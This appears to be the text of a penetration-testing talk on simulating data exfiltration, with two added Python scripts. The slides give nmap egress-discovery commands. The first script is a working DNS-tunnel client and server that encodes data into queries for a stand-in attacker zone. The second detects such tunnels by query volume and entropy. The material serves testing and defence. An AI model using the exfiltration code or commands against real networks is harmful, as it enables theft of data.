revolves around finding and exploiting a particular vulnerability in a system, or testing security controls as they stand at a point in time, or achieving Domain Admin ;) • Attackers exfiltrate data from their victims, so why not test the same thing ourselves and help the customer before an outsider does it for real?
Data Encrypted • Data Transfer Size Limits • Exfiltration Over Alternative Protocol • Exfiltration Over Command and Control Channel • Exfiltration Over Other Network Medium • Exfiltration Over Physical Medium • Scheduled Transfer • Ref: https://attack.mitre.org/wiki/Exfiltration
the network • Step 1: Find out which ports are allowed from inside to outside • nmap -sS -Pn open.zorinaq.com • nmap -sS -Pn portquiz.net • (both hosts accept TCP connections on every port, so any port nmap reports as open is one the egress filter lets out; ports shown as filtered are being blocked. -sS needs root, and this only tests TCP) • Step 2: Choose the protocol over which you want to exfiltrate the data (pick one that uses an allowed port) • Step 3: Choose the data you want to exfiltrate • Step 4: Start the exfiltration
client/server model • Simulates data exfiltration • Exfiltrates data over multiple protocols • HTTP / HTTPS • FTP / SFTP • ICMP • SMB • DNS / DNS_Resolved • Simulates malware or APT traffic • Easy to use ;)
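The four steps above, carried through end to end for the DNS case, as an added example (this is not the slide's tool and not code from the deck). Step 1 is shown as a parser over a constructed sample of nmap's grepable (-oG) output for a host that answers on every TCP port, Step 2 maps the allowed ports to a protocol, and Steps 3 and 4 are a minimal client/server pair: the client turns the payload into DNS query names under a hypothetical attacker-controlled zone (exfil.example) and the server side reassembles them. The zone name, the sample scan output and the "secret" are all made up for the example.

```python
"""Egress discovery + DNS exfiltration simulation (added example, not the slide's tool)."""
import base64
import re

# Constructed sample in nmap's grepable (-oG) format, resembling a scan of a
# host that listens on every TCP port. Not a real capture.
NMAP_GREPABLE = (
    "# Nmap scan initiated as: nmap -sS -Pn -oG - portquiz.net\n"
    "Host: 203.0.113.10 (portquiz.net)\tStatus: Up\n"
    "Host: 203.0.113.10 (portquiz.net)\tPorts: 53/open/tcp//domain///, "
    "80/open/tcp//http///, 443/open/tcp//https///, 22/filtered/tcp//ssh///, "
    "3389/filtered/tcp//ms-wbt-server///\n"
    "# Nmap done\n"
)

# Hypothetical attacker-controlled zone used for the simulation.
EXFIL_DOMAIN = "exfil.example"
MAX_LABEL = 63   # RFC 1035: a DNS label is at most 63 octets
MAX_NAME = 253   # practical limit for a full name in presentation form

PORT_TO_PROTOCOL = {53: "dns", 80: "http", 443: "https", 21: "ftp", 22: "sftp", 445: "smb"}


def allowed_egress_ports(grepable: str) -> list[int]:
    """Step 1: because the target answers on every TCP port, a port reported
    open means the egress filter let the SYN out; filtered means it did not."""
    return sorted(int(m.group(1)) for m in re.finditer(r"(\d+)/open/tcp", grepable))


def choose_protocol(open_ports, preference=("dns", "https", "http", "ftp", "sftp", "smb")) -> str:
    """Step 2: pick the first preferred protocol whose well-known port is allowed out."""
    available = {PORT_TO_PROTOCOL[p] for p in open_ports if p in PORT_TO_PROTOCOL}
    for proto in preference:
        if proto in available:
            return proto
    raise RuntimeError("no usable egress protocol among open ports")


def dns_encode(data: bytes, domain: str = EXFIL_DOMAIN, labels_per_query: int = 3) -> list[str]:
    """Client side of Step 4 over DNS: base32 the payload (DNS names are
    case-insensitive, so base64 would be corrupted by resolvers), cut it into
    63-byte labels and prefix each query with a sequence number so the server
    can put queries that arrive out of order back in sequence."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = MAX_LABEL * labels_per_query
    queries = []
    for seq, start in enumerate(range(0, len(b32), per_query)):
        chunk = b32[start:start + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([str(seq)] + labels + [domain])
        assert len(name) <= MAX_NAME
        queries.append(name)
    return queries


def dns_decode(queries, domain: str = EXFIL_DOMAIN) -> bytes:
    """Server side: the authoritative name server for `domain` sees every query,
    strips the zone, reorders by sequence number and restores base32 padding."""
    suffix = "." + domain
    parts = {}
    for name in queries:
        if not name.endswith(suffix):
            continue  # unrelated query for another zone
        labels = name[: -len(suffix)].split(".")
        parts[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(parts[seq] for seq in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


if __name__ == "__main__":
    ports = allowed_egress_ports(NMAP_GREPABLE)
    proto = choose_protocol(ports)
    print("allowed out:", ports, "-> exfiltrating over", proto)
    # Step 3: the data to exfiltrate (constructed, obviously fake).
    secret = b"customer export\nname,card\nA. Tester,4111111111111111\n" * 10
    queries = dns_encode(secret)
    print(len(queries), "queries, first:", queries[0])
    assert dns_decode(queries) == secret
```

In a real engagement the client would send each name as a query to the resolver the victim machine is configured with, and the server side would run on the authoritative name server for the zone, which is why the decoder ignores names outside its own zone and tolerates arbitrary query order.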
blindly trust perimeter security tools, test them! • Monitor the volume and frequency of data transmitted by your users over email, DNS and other organizational messaging tools and baseline what is normal • Block unauthorized communication channels (egress filtering for anything that is not explicitly needed) • Prevent phishing attacks and credential theft • Security-aware employees
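The "monitor volume and frequency" point above, turned into detection logic as an added example (not part of the deck): the script aggregates a constructed resolver log per client and registered domain and flags pairs whose query count, bytes carried in subdomains, or average subdomain entropy stand out, which is what a DNS tunnel like the one simulated earlier looks like from the defender's side. The log lines, the client addresses, the zone exfil.example and the thresholds are all made up for the example; in production the thresholds would come from a baseline of the environment.

```python
"""Volume/frequency baseline over DNS query logs (added detection example, not the slide's)."""
import base64
import hashlib
import math
from collections import Counter, defaultdict


def _fake_exfil_name(i: int) -> str:
    """Deterministic high-entropy query name of the kind a DNS tunnel produces."""
    labels = [
        base64.b32encode(hashlib.sha256(f"chunk-{i}-{k}".encode()).digest()).decode().rstrip("=").lower()
        for k in range(3)
    ]
    return ".".join([str(i)] + labels + ["exfil.example"])


# Constructed resolver log, one line per query: "<timestamp> <client-ip> <query-name>".
# 10.0.0.5 browses normally; 10.0.0.9 is tunnelling data out. Not a real capture.
DNS_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.5 www.example.com",
    "2024-05-01T10:00:02Z 10.0.0.5 mail.example.com",
    "2024-05-01T10:00:03Z 10.0.0.5 cdn.example.com",
    "2024-05-01T10:00:04Z 10.0.0.5 www.example.com",
    "2024-05-01T10:00:05Z 10.0.0.5 api.example.com",
    "2024-05-01T10:00:06Z 10.0.0.5 login.example.com",
] + [f"2024-05-01T10:01:{i:02d}Z 10.0.0.9 {_fake_exfil_name(i)}" for i in range(40)]


def registered_domain(name: str) -> str:
    """Crude: the last two labels. Fine for the sample; a real detector should use
    the Public Suffix List so co.uk-style names are not split wrongly."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def shannon_entropy(s: str) -> float:
    """Bits per character; random base32 is close to 5, human-chosen hostnames far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def analyse(log_lines, max_queries=25, max_subdomain_bytes=2000, min_avg_entropy=3.5):
    """Aggregate per (client, registered domain) and return the pairs that exceed
    any threshold, with the reasons, so an analyst sees why a pair was flagged."""
    stats = defaultdict(lambda: {"queries": 0, "sub_bytes": 0, "entropy_sum": 0.0})
    for line in log_lines:
        _ts, client, qname = line.split()
        dom = registered_domain(qname)
        # Everything left of the registered domain is attacker-controllable payload space.
        sub = qname.lower()[: -len(dom)].rstrip(".").replace(".", "")
        s = stats[(client, dom)]
        s["queries"] += 1
        s["sub_bytes"] += len(sub)
        s["entropy_sum"] += shannon_entropy(sub)

    alerts = []
    for (client, dom), s in sorted(stats.items()):
        reasons = []
        avg_entropy = s["entropy_sum"] / s["queries"]
        if s["queries"] > max_queries:
            reasons.append(f"{s['queries']} queries")
        if s["sub_bytes"] > max_subdomain_bytes:
            reasons.append(f"{s['sub_bytes']} bytes carried in subdomains")
        if avg_entropy > min_avg_entropy:
            reasons.append(f"average subdomain entropy {avg_entropy:.2f} bits/char")
        if reasons:
            alerts.append((client, dom, reasons))
    return alerts


if __name__ == "__main__":
    for client, dom, reasons in analyse(DNS_LOG):
        print(f"ALERT {client} -> {dom}: " + "; ".join(reasons))
```

The same three measures (count, bytes, entropy) apply to any channel where the client controls a field the logs record, such as URL paths over HTTP or attachment sizes over email; what changes is only the field being aggregated.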